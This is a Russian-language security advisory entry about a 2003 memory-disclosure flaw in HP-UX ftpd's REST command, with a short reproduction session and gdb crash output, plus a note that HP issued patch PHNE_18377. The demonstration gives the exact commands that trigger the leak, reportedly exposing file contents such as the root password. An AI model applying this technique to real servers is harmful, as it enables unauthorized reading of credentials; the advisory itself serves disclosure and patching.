Дата публикации: | 10.06.2003 |
Всего просмотров: | 1032 |
Опасность: | |
Наличие исправления: | |
Количество уязвимостей: | 1 |
CVE ID: | Нет данных |
Вектор эксплуатации: | |
Воздействие: | |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: | |
Описание: | Уязвимость обнаружена в HP/UX 'ftpd' в команде REST. Удаленный пользователь может просматривать содержание произвольных файлов в памяти системы.
Сообщается, что удаленный пользователь может использовать команду REST (reset) и определить местоположение памяти, чтобы просматривать содержание файлов из памяти. Пример: (еще несколько примеров можно найти в источнике сообщения): frieza elguapo $ ftp 192.168.1.111 Connected to 192.168.1.111. 220 kakarot FTP server (Version 1.1.214.4 Mon Feb 15 08:48:46 GMT 1999) ready. Name (192.168.1.111:root): elguapo 331 Password required for elguapo. Password: 230 User elguapo logged in. Remote system type is UNIX. Using binary mode to transfer files. ftp> rest 1111111111111111 restarting at 2147483647. execute get, put or append to initiate transfer ftp> get . local: . remote: . 200 PORT command successful. # gdb /usr/lbin/ftpd 2862 GNU gdb 4.18-hppa-991112 Copyright 1998 Free Software Foundation, Inc. /home/elguapo/2862: No such file or directory. Attaching to program: /usr/lbin/ftpd, process 2862 Unable to find __dld_flags symbol in object file. (gdb) c Continuing. Program received signal SIGSEGV, Segmentation fault. 0xc00ef0b8 in ?? () (gdb) bt #0 0xc00ef0b8 in ?? () Error accessing memory address 0x7fffffff: Bad address. (gdb) info registers r3 r11 r3: 7fffffff r11: 7fffffffУязвимость может использоваться, например, для получения root пароля из памяти. Уязвимость связана с неправильным использованием конверсионного символа в строке формата. Уязвимость обнаружена в HP/UX ftpd 1.1.214.4 Hewlett Packard выпустил заплату PHNE_18377, устраняющую эту уязвимость. |
Ссылки: | HPUX ftpd remote issue via REST |